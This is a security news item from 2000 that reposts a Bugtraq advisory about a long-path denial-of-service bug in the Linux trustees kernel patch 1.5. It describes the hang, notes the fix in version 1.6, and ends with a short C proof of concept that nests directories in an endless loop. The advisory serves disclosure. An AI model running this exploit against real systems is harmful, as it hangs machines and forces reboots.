Originally Published: Monday, 10 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1 - [Printable]

Linux trustees vulnerability found

[BT] An exploit for the recently announced Linux trustees, an advanced permission kernel patch, has been found and announced on bugtraq. This exploit only affects version 1.5 and ealier.

   Page 1 of 1  

From: "Andrey E. Lerman" Subject: linux trustees 1.5 long path name vulnerability To: BUGTRAQ@SECURITYFOCUS.COM

Linux trustees is a kernel patch which provide Netware-like permissions to linux. It is not in kernel by default.

For more information see project's website at http://www.braysystems.com/linux/trustees.html

Problem description: When accessing a file or directory with a very long path the process hangs in an unkillable state. All other processes are SEGFAULTing when trying to access unkillable process' /proc entry. So system utilities ps, w, top, killall and the like are stoppping working. Except that, the system continues to function normally. The only solution is reboot.

The only version tested is trustees 1.5 for linux 2.2.14. But it seems what other versions of linux trustees <1.6 are vulnerable.

I'm not sure if this vulnerability is only local DoS. It may be possible to overwrite the process' structures in the kernel, causing privileges elevation. I haven't investigated that possibility yet, so I may be wrong. Servers with open ftp incoming directory, nfs or samba shares are at risk too.

Status: This problem is fixed in linux trustees 1.6, available for linux 2.2.14 and 2.3.99. Thanks to the author of the package, Vyacheslav Zavadsky for a quick response.

Exploit: #include <stdio.h> #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h>

int main(void) {

while(1) { if(mkdir("aaaa",0777)<0) { perror("mkdir"); exit(1); } if(chdir("aaaa")<0) { perror("chdir"); exit(1); } }

return(0); } -- END --

   Page 1 of 1